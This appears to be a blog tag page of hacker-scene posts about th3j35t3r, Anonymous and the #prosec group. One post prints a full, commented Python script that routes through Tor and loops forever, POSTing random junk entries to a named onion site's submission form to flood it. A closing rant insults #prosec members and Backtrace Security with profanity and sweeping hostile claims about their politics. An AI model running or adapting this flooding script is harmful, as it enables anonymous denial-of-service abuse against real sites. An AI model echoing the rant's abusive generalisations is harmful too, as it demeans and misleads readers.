Posts for: #Prosec

th3j35t3r: Was it really that tough to figure out?

I’ve been watching the tweets of @cubespherical with a sense of irony in the back of my mind. The story is so far fetched, the monetary goal beyond ridiculous. I won’t present a whole lot of reference material in this post, it’s merely an insomniac’s rant. However, read through and you just might agree with a few of my points.

First and foremost, if you’ve kept up with @th3j35t3r’s (now defunct) twitter account, you’ve seen “a certain writing style”. What’s more, if you’ve used IRC at all in places he has been known to lurk, you’ve seen a few writing styles. I’ve seen jester’s writing style jump from proper capitalization to apropos internet junkie shorthand. Either this guy has MPD, or he’s a fucking SE master. Then again, there is a more likely explanation, one that’s been put forth on the internet but actually disregarded. It’s quite likely jester does have MPD, in that the identity is/was comprised of several individuals. The identity amounted to no more than a puppet of several people with a common goal.

[]

The Anti-Anonymous Movement

Anonymous has had some bad eggs in it’s time. There have been violent adherents, bad ideas, and blemishes all around. The spirit of revolution and change for the better has been pock marked by bad decisions due to a select few not following any ethical path. Though the movement is large and diverse, with many participants. “The Internet Hate Machine” as it was once known is dead, they’re now just a bunch of kids wanting governments and corporations to behave- or else.

[]

#Prosec Attacks on Doxbin

Looks like #prosec is nerdraging on @doxbin. The effects can be seen here. The attack I noticed first was a semi-lame HTTP POST attack that floods doxbin with garbage “dox”. Code here:

#!/usr/bin/python

import socks
#google it, it's a common python extension
import socket
#127.0.0.1:9050 is the default TOR socks4 proxy
#this connects to TOR
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, "127.0.0.1", 9050)
socket.socket = socks.socksocket
from httplib import *
from urllib import *
import random
import time
import hashlib

times = 1
while 1:
	############DOX############
	doxrand = random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
	dox = hashlib.sha224(doxrand).hexdigest()
	print dox
	#doxrand = picking a random character
	#dox = SHA hashing of the random character defined in doxrand
	##############NAEM###########
	naemrand = random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
	naem = hashlib.sha224(naemrand).hexdigest()
	print naem
	#same as above
	##############

	connection = HTTPConnection("doxbinumfxfyytnh.onion")
	#establishing HTTP conenction to website
	head = {"Content-Type" : "application/x-www-form-urlencoded", "Accept" : "text/plain"}
	#constructing the header, so the webserver will respond properly
	parameters = urlencode({"naem" : naem, "dox" : dox})
	#defining the data to be used during POST, note naem and dox refer to the random strings from ealier
	#they must correspond to the ID fields from the web form, otherwise..it won't work
	connection.request("POST", "/post.php", parameters, head)
	#pushing the data to the post function of the php file
	print 'Connection OK...Continuing..'
	print 'Spammed', 
	print times, 
	print 'times!'
	times = times + 1
	time.sleep(30) #in seconds
	#self explanitory

Now, however, it looks like there are 403 Forbidden errors. I’m thinking Nachash will get things running again soon.

[]

Musings on Information Security

I’ve been thinking a lot lately about the “PsyOPS” and “InfoSec” professionals that are wildly chasing hackers all over the internet. People claim they’re so elite because they’re infiltrating A GROUP THAT ANYONE CAN JOIN, REGARDLESS OF RACE, CREED, OR RELIGION. I guess it’s tacitly not infiltration, as I’m sure some of the “legit” members don’t have the group’s best interest at heart, for various reasons. So if you’re claiming to be “Destroyer of Anonymous”, you fail at life. You’re a fucking loser- an asshat. The reality is that Anonymous is destroying itself. It swells and declines. It will always eliminate parts of itself. Kind of like pruning. No group with such radical and diverse beliefs can remain cohesive. However, all “#prosec” douchebags are typically Republican, Bradley Manning hating government suckups who shit on the first amendment and would love to see all Arab Americans die. These are not generalizations- these fucking nutbags still have sore tits over 9/11. At least, the “twitter vocal” ones are that way. It’s ironic. If you want to gain support for your cause of “hating Anonymous”, wouldn’t you be nicer than a nazi? My guess is “mudsplatter / hubris” is still on the #prosec side of the fence, hunting Anonymous down with PsyOPS and trolling. However, he’s playing good cop at the moment. The minds at Backtrace Security likely discovered that being raging douches from all angles doesn’t get you very far. So riding high on the crest of “namshub.pdf” and the fact that all their dox came from the fallout just before HBGary, they’re trying like Hell to prove they’re actually worth something to the internet, and not just screaming trolls.

[]